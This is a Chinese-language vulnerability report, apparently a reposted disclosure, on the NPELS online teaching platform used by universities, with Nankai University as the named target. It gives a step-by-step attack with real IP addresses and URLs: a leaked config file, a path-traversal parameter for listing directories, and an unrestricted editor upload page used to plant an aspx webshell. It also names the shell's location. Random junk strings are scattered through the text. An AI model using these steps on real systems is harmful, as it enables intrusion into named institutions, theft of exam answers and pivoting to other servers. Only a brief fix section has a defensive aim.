新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
7 w# _2 S" I4 I
% U7 n) n4 I! s+ Z详细说明：
  L5 h' r7 c$ k; B0 I: ~) S
2 q' y2 a% G8 |  o' h以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
8 `: P* l5 c' b/ Z% ^  |6 A<setting name="Update_CommonSvr_CommonService" serializeAs="String">
5 g- p, L3 \, R<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
7 S+ {" _* r! E2 J" t直接访问
% R9 {7 c6 ^: rhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
8 g9 `) B/ Y: h' e
发现
0 n" [; r0 `9 o: khttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
8 {8 v- N# i' {- {3 \# {! C) a, P$ k可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
: B$ v9 ?' T" C& u0 M7 s7 \- t/ ]
& J9 m1 ^* r& D# }OOXX
- b, T9 a* v8 _2 j; ~: I
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
( A9 d* v+ @$ C) R% j漏洞证明：

0 w/ [  N2 d( q8 V& x; E% h列目录：
+ r- X& {/ Y) K" Ghttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
+ O' z! f3 j: h8 ?- ahttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
# P: i7 |2 _2 D( p  M+ ~http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
7 d' o% A6 `3 t最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
  I7 t8 L0 s* p& D